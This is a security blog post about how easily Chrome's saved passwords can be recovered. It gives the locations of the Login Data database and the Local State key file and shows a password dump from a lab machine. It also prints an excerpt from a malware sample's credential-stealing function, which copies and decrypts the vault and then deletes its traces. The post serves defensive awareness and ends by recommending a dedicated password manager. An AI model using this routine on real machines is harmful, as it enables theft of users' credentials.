Use Your Browser Internal Password Vault... or Not?
Passwords... such a hot topic! Recently the big players (Microsoft, Apple & Google) announced that they would like to get rid of (or, at least, reduce the use of) classic passwords[1]. In the meantime, they remain the most common way to authenticate users against many online services. Modern browsers offer lightweight password management tools ("vaults") that help users save their passwords in a central repository. So they don't have to remember them, and they can follow the golden rule that we, infosec people, have been recommending for a long time: never reuse a password across services. But is it really safe?
I'm involved in a security incident where some administrative accounts for web applications have probably been leaked. During the investigation, I wrote a quick YARA rule to search for the suspicious account names across files on the developers' computers. And I found a lot of them stored in the Chrome password databases. The default path for this file is:
%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Login Data
This file is a SQLite database. Fortunately, the passwords stored in it are encrypted (AES-256-GCM, blobs prefixed with "v10"), but it's pretty simple to decrypt them: the AES key used to encrypt them is stored right next to the database, in a JSON file:
%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State
I won't explain here how to decode this key and use it to decrypt all passwords. Note that the key is only wrapped with the Windows DPAPI, bound to the user account, so any code running in the user's session can unwrap it without knowing any extra secret. This is pretty straightforward to do in Python. Here is an example of dumping passwords from a lab Windows machine with Chrome:
C:\Users\xavier\Lab>python dumppass.py
Origin URL: https://selfoss.xxxxxxxxxxxx/
Action URL: https://selfoss.xxxxxxxxxxxx/
Username: xavier
Password: xxxxxxxx
Creation date: 2022-05-17 08:26:16.687562
Last Used: 2022-05-17 08:26:13.094214
==================================================
Origin URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/
Action URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/index.php
Username: admin
Password: xxxxxxxxxxxxxxxxxxxx
Creation date: 2022-05-17 08:49:44.385977
Last Used: 2022-05-17 08:49:41.002207
==================================================
Since it's so easy to extract passwords from Chrome, many malware samples implement the same technique to exfiltrate your passwords. Here is a sample found this morning on VT:
import os
import shutil
import sqlite3

# Excerpt from the malware sample: the helpers get_master_key() (decodes the
# DPAPI-wrapped key from "Local State") and decrypt_val() (AES-GCM decryption of
# one password blob) live elsewhere in the same class and are not shown here.
def grabPassword(self):
    master_key = self.get_master_key(
        self.appdata+'\\Google\\Chrome\\User Data\\Local State')
    login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
    # The database is locked while Chrome runs, so the sample works on a copy.
    login = self.dir+self.sep+"Loginvault1.db"
    shutil.copy2(login_db, login)
    conn = sqlite3.connect(login)
    cursor = conn.cursor()
    with open(self.dir+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
        cursor.execute(
            "SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = self.decrypt_val(
                encrypted_password, master_key)
            if url != "":
                f.write(
                    f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")
    cursor.close()
    conn.close()
    # Remove the working copy to leave fewer traces behind.
    os.remove(login)
My recommendation is to not store your passwords in these browser vaults but to use a real password manager instead! Most of them have plugins available for all common browsers and provide the same ease of use, while keeping the vault encrypted under a master password that you have to type to unlock it, rather than under a key that any process running in your session can recover. Stay safe!
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key